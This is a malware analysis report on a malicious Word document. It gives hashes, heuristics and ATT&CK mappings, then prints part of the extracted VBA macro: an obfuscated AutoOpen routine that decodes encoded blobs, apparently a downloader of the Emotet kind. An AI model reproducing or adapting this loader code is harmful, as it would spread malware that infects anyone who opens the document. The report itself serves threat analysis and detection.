Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 23e87b6ae0bc9723…

MALICIOUS

Office (OLE)

150.0 KB Created: 2018-04-12 20:46:00 Authoring application: Microsoft Office Word First seen: 2018-07-14
MD5: 12d707b1a4011fff49ed4e5751bc98e2 SHA-1: 0909cb5c6573934f9d109364d7fc82ef6f4129a3 SHA-256: 23e87b6ae0bc972369e9fbceff9f1dcac715ac30da760957d8e30bdbf03b3a3d
204 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The 'AutoOpen' subroutine and the 'Shell()' call within the VBA code indicate an attempt to execute arbitrary commands. This is a common technique for downloading and executing further malicious payloads. The ClamAV detection name 'Doc.Malware.Emodldr-10025032-0' also suggests a known downloader variant.

Heuristics 7

  • ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 38554 bytes
SHA-256: e30053f48d37fce3e755bf7edb02d75b198c444723fce845378482e10462cae7
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 21 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "nBHRnrZYbmCf"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Select Case WrTjO
Case 35772
LXnwWG = 14890
nQSfX = Tan(5 - CInt(CUviZR) / IBdXp + 39892)
End Select
Application.Run KolZY + "LWmkbVVjdv" + MEzGIw, jDcZXm + HoEHwQNwfsF + UXXwoA
Select Case DVJYhl
Case 82463
wftGr = 37254
VoZaiX = Tan(5 - CInt(ZEzDl) / mQnkXr + 17339)
End Select
End Sub

Attribute VB_Name = "phbNwVEzjRuQ"
Sub CiYOW(zwFZd)
Select Case uXhrI
Case 66739
KOfHwN = 64079
AbXiI = Tan(5 - CInt(YkiPW) / aLnkI + 95491)
End Select
End Sub
Function HoEHwQNwfsF()
On Error Resume Next
Select Case WjqLW
Case 25162
sCBjqG = 65071
QJicj = Tan(5 - CInt(CwcGk) / OYVSA + 70119)
End Select
UjwGAslnU = uBNocZ("ZHX5J8MAZABmAGMANQA5AGEAOQA3ADgANwBlADAAMwAyAGMAZAAzADcANABmADkAZQBlADMANAA1ADEAYwA0ADAAYgA0ADEAYQBmAGYAYQBlADkAMAAxAGMAYQA0AGYAZQBhADMANABjADMAMAAyADgAYgBhAGIAYQA0AGQANwAxADQANgBkAGQAYQiBM", 7 + izLikW - izLikW, 180 + izLikW - izLikW)
Select Case OwZJWO
Case 36353
zpmWS = 79708
mInFfB = Tan(5 - CInt(mOFmr) / UhiiG + 31313)
End Select
Select Case njPLMH
Case 93040
POavb = 34627
zBBBf = Tan(5 - CInt(kBECuu) / zkKtw + 44302)
End Select
AwVTNbst = uBNocZ("jiADgANAA5ADIAYwBlAGIANwA3ADIANABmAGYAYgA0AGMANQBjAGMAZQBlADUAMgAzADgAMQA2ADQAZAAwADUAMwA3ADkAOQBiADMANQA4ADQAZAAxADUAOAA4ADcAYwA4ADAAZgAxADEAYQAxADcAZgBhAGUANABiADUAMgAyAGwjNCSC", 3 + LqzLN - LqzLN, 170 + LqzLN - LqzLN)
Select Case LMfAzp
Case 96303
FpOUW = 82785
BpjwB = Tan(5 - CInt(hKJSN) / DiEjzE + 52494)
End Select
Select Case SqVhIR
Case 66862
UKZkUq = 83177
jOWhtB = Tan(5 - CInt(ziojdz) / XdAYcO + 2475)
End Select
RzYuizuZa = uBNocZ("PdAYDYAZQA2AGIAMwBjADEAMwBjAGEAOQA2AGEANQBlAGQAOQA3Aiq", 5 + mVBDp - mVBDp, 48 + mVBDp - mVBDp)
Select Case TStVMZ
Case 41611
dAOCF = 63514
DDRHVw = Tan(5 - CInt(kEjqn) / kwOczG + 89656)
End Select
Select Case oXrGP
Case 86322
ampiL = 25233
ssbHmV = Tan(5 - CInt(dcCsC) / MhdwXK + 25128)
End Select
ImazHMj = uBNocZ("Um8YAMgA0AGIANQBiAGQAOQBlADgAMJ1C", 4 + oYoJi - oYoJi, 27 + oYoJi - oYoJi)
Select Case CMPRw
Case 42649
BJNSkz = 24043
ziTODK = Tan(5 - CInt(pONDzs) / rGBAw + 81672)
End Select
Select Case hLpDL
Case 90099
nHdFin = 70799
aQfQVW = Tan(5 - CInt(pFcYEA) / mzfQF + 12944)
End Select
WhTDZGp = uBNocZ("fEAZgBmADEANABjAGIAMQA1ADIANgAyADUAOABjAGMANgA2AGMAYQAyADUAMgA1AGQAOAAyADAAZQAzAGIAYQA0ADIAMQAwAGUANgA2ADQAMgA3ADYANgAwADEANQBmADQANwA1ADEAZgA2ADcAZQA5ADcAYQA5AGUANwAzADIAi4U9M82L", 2 + Lqpwic - Lqpwic, 170 + Lqpwic - Lqpwic)
Select Case LjzlA
Case 82197
MRrtA = 19565
HhrKA = Tan(5 - CInt(Wjampr) / VjZRhi + 48177)
End Select
Select Case OiGOC
Case 87383
dizawz = 58854
CwdjCI = Tan(5 - CInt(tPMGNT) / DCnhp + 93181)
End Select
acrzt = uBNocZ("w,lQBhAGIAMwBiAGEANQA0ADkAZQA1AGMANQBmADkAOABjADEAMwBhAGMAMwA4AGMAMgA2AGIAZgAzADYAZQBmADcAYwA2ADMAYQBlAGQAMAA1AGEAYwAwAGEAMgBmADgAYQBjADUANQAzADcAMQBkADkAMQA4ADUAZQA2ADEANgA4ADMANAA2AGQAMwAwADUAOA88fs", 4 + jhiUf - jhiUf, 193 + jhiUf - jhiUf)
Select Case bqFNlw
Case 71347
ZNhlQH = 23126
QNwSor = Tan(5 - CInt(wfKEb) / nOJiBb + 11751)
End Select
Select Case IZIVE
Case 8935
JonGII = 49225
RwCUf = Tan(5 - CInt(zwtoW) / jqJhb + 16312)
End Select
uZzWo = uBNocZ("Yw29qGfMAA2ADYANAAxADMAMgA0ADEAOQAyADkAMgA2ADUAOQAyADEAOAA1AGQAMABmAGMANAA0AGQAOQAxADUAYgA1AGYANAAyAGEAMgA1ADYAMwBmADQANgAxADEAMQBhAGYAZgA0ADAAZQBiAGEAYgBkADcANwBlADYAZAA2AGUAZgBlAGEANwA3ADcAMwA5AGYANwAyAZI", 8 + VQJLH - VQJLH, 197 + VQJLH - VQJLH)
Select Case GbHhv
Case 94641
izzjT = 29902
RwjhRz = Tan(5 - CInt(IaOhho) / SiGfz + 74732)
End Select
Select Case nnHBlO
Case 69930
dLnLZD = 63289
rjXOwM = Tan(5 - CInt(XdWzhG) / FiAZcG + 13920)
End Select
ifKEUb = uBNocZ("Rz4wGEAYwA0ADgAMgAxAGEAZABlADAALq4", 5 + dJQHX - dJQHX, 27 + dJQHX - dJQHX)
Select Case rTZZXT
Case 80427
iDskY = 59134
Ntbrk = Tan(5 - CInt(PQCbC) / JLzba + 4
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.